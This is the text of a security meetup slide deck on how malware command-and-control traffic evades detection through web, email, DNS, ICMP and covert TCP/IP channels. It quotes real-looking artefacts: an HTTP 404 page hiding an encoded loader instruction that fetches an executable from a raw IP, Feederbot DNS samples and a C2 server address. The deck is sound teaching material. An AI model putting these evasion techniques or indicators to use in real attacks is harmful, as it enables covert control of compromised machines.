Upload
nullowaspmumbai
View
250
Download
1
Embed Size (px)
Citation preview
MALWARE COMMAND AND CONTROL: EVASION TACTICS AND TECHNIQUES
Avkash Kathiriya
Information Security Learner
Dhawal Shah
Information Security Learner
AGENDA
• CKC (Cyber Kill Chain) Revision
• What is Command and control?
• What is Malware CnC?
• Why CnC?
• Channels of CnC
• Some Advance CnC
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 2
Our focus on this session will be
Command and Control 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 4
C:\ Command and Control > CnC.txt
Command
Control
&
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 6
C:\ Command and Control > CnC.txt
Command
Control
Idea is to give command to control your systems and accomplish your aim
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 7
What is Malware CnC?
Compromised system
Command and control server
Command
Co
mm
and
Response
Res
po
nse
Attacker
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 8
Why Malware CnC?
• Receive commands from operator
• Send feedback to operator
• Receive updates and modules from operator
• Evade security
• Intrusion detection
• Antivirus
• Incident response
• Forensics analysis
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 10
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 12
Evolution of CNC Techniques
Mostly IRC based malwares Rapid evolution of CNC techniques
P2P DNS HTTP
Domain Flux
Tunnelling
Answer is to stay undetected = Need
of covert communication
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 14
Covert communication? • Capability to transfer information between two hosts, which are not explicitly allowed to
communicate.
• a mechanism for sending and receiving information data between machines without
alerting any firewalls and IDSs on the network.
• You want to communicate with someone without being observed
• Cryptography/Encryption is not good enough
– You want to hide the fact you are communicating at all
– Best way is to hide the communication in innocuous-looking network traffic or data
– Firewall must let the traffic pass through
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 15
Covert communication?
DNS Requests
DNS Reply
Malicious DNS Requests
Malicious DNS Reply
It’s a method of performing malicious
communication with the legitimate and basic
channels which you can not block at perimeter
level e.g. DNS in this case
Internal Network
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 16
Before that lets first understand basic
User communication channels
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 18
Channels of “User” communication
Endpoint
Email Web
Network
User
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 19
Channels of “Malware” communication
Endpoint
Email Web
Network
Malware
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 22
Web CnC?
• Direct connection to Internet on port 80
• Which will be blocked in most of the cases
• Identify Proxy being used and divert Web Cnc to proxy
• Proxy needs authentication which malware anyway can get it
• Reverse WWW shell
• Looks ordinary http request on firewall to servers
• Server sends back html resources interpreted as shell command
• Eg. GoToMyPC 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 24
Advance Web CnC?
• Using HTTP GET and POST for communication
• HTTP Tunneling
• Downloading Information in favicon.ico
Extract info using LSB Stagno
Decrypt info using RC4
favicon.ico
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 25
Advance Web CnC?
• Youtube as a malware CnC
Attacker
Endpoint
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 29
Advance Web CnC? • HTTP Error messages
HTTP/1.1 404 Not Found Date: Mon, 9 Jul 2015 06:13:37 GMT Server: Apache/2 X-Powered-By: PHP/5.3.29 Vary: Accept-Encoding,User-Agent Content-Length: 357 Connection: close Content-Type: text/html; charset=utf8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyOD UxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG--> ============================================================================= Decoded Value: 1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 30
Email CnC?
• It’s pretty simple just use SMTP channel for sending and receiving commands from your controller
Endpoint
Attacker
Sending command through SMTP
Receiving response through SMTP
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 33
Evasion techniques seen in this type of communication is use of Power shell
Network CnC?
Types of covert channel communication @ network layer
• Storage Channels
– Hide data within unused TCP/IP packet header fields
• TCP Flags field, TCP ISN, etc.
• Timing channels
– Modulate system resources in such a way that a receiver can observe and decode it
– Port Knocking, varying packet rates, etc.
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 35
Network CnC? • Protocol Tunneling:
– Protocol that carries data from another protocol.
– Example: SSH
– SSH allows to set up a secure connection between two computers.
– Can use this connection for insecure protocols such as ftp.
• Tunnel through any TCP / IP traffic
– Insert data in unused or misused fields in the protocol header of packets, such as:
– IP Identification.
– TCP sequence number.
– TCP acknowledgment number.
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 36
Network CnC? • Hiding information on existing protocols such as HTTP,
DNS, and ICMP
• Pros/Cons with each protocol
– HTTP good for large data transfer, but more conspicuous
– DNS not great for data transfer, but good for C&C
– ICMP is good for C&C but is often blocked
• Author of The Rootkit Arsenal
proposes writing your own TCP/IP
stack using MS Windows NDIS
• BitTorrent Tracker protocol
tunneling 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 37
Network CnC? Example: LOKI
Attacker install Loki server (a.k.a. LokiD) on victim. Attacker runs Loki client on his own machine. Loki tunnels attackers commands:
Attacker writes shell commands. Loki client sends out several ICMP packets to victim that
contain part of the commands. Loki server receives ICMP packets and extracts attacker
command. Loki server executes them. Reversely, Loki server wraps responses in ICMP messages,
sends them to the Loki client, which displays them. Port scanners or netstat cannot detect Loki since ICMP does not
use ports. Only traces are the Loki server running as root and ICMP
messages going back and forth. 6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 38
Network CnC? • ICMP Covert Tunnels
• Mechanism • Use of Ping request /response
• Tool: Ptunnel ((http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.71.tar.gz))
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 39
ICMP Covert Tunnels
• Wireshark capture of ptunnel tool
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 41
DNS Covert Tunnels Mechanism of DNS Covert Channel - Feederbot
Normal: ;QUESTION newcommunitybank.com. IN A ;ANSWER newcommunitybank.com. 86400 IN A 74.54.82.153 =========================================================================== Malicious: ;QUESTION f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY ;ANSWER f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT "aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 42
DNS Covert Tunnels Mechanism of DNS Covert Channel - Feederbot
• 50-char system-dependent bot ID:
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4 • RC4-encrypted bootstrap traffic 0000 8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32 .h..........94.2 0010 33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F 3.6.67.images.mo 0020 76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C viedyear.net..< • Contains a referral to the next C2 server node 94.23.6.67
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 43
DNS Covert Tunnels • WireShark Capture of OzymanDNS
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 45
Endpoint CnC??
Endpoint USB
Not actual CnC, but methods of infection and communication was USB in this case.
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 49
Conclusion
• CnC is key for any malware to sustain it’s footprint
• Techniques and tactics to evade the CnC channel has evolved from time to time
• Idea is to hide in the mass and exploit the flows in traditional communication channels
• Attackers stay connected with there target and keep on nurturing the malwares planted
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 50
References
• Lockheed Martin Cyber Kill Chain
• SANS Institute – Covert channels
• Introduction to malicious code – Erland Jonsson
• Black hat EU15 – Hiding In Plain Sight
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 51
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 52
• Twitter : @avkashk
• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)
• Email : [email protected]
• Twitter:@shahdhawal
• Email: [email protected]